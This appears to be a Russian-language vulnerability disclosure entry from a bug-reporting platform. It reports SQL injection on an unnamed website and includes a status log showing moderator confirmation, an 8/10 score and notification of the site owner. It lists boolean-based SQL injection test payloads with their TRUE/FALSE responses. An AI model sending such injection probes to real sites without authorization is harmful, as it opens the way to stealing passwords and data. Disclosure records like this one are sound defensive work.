Подробная информация
Есть SQL инъекции на сайте.
Используя эту слабость возможно краст конфиденциальной информации с сайта (пароли, структура сайта и т.д.)
Запись URL POST c -1 OR 3 * 2 * 16 AND 00075=00075
Тесты:
-1 OR 2+75-75-1=0+0+0+1 -- => TRUE
-1 OR 3+75-75-1=0+0+0+1 -- => FALSE
-1 OR 3*2<(0+5+75-75) -- => FALSE
-1 OR 3*2>(0+5+75-75) -- => FALSE
-1 OR 2+1-1-1=1 AND 00075=00075 -- => TRUE
-1 OR 00075=00075 AND 3+1-1-1=1 -- => FALSE
-1 OR 3*2=5 AND 00075=00075 -- => FALSE
-1 OR 3*2=6 AND 00075=00075 -- => TRUE
-1 OR 3*2*0=6 AND 00075=00075 -- => FALSE
-1 OR 3*2*1=6 AND 00075=00075 -- => TRUE
Записи
-
12 Январь 2017, 16:33
Статус уязвимости
Получен ответ от источника -
05 Январь 2017, 20:02
Статус уязвимости
Отправлено сообщение об уязвимости на электронный адрес источника -
30 Декабрь 2016, 08:14
Уязвимости присвоен балл
Модератор присвоил 8 баллов из 10-и на уязвимости -
30 Декабрь 2016, 08:13
Статус уязвимости
Подтверждено со стороны модератора -
29 Декабрь 2016, 23:06
Добавлена уязвимость
Добавлена уязвимость на BUGemot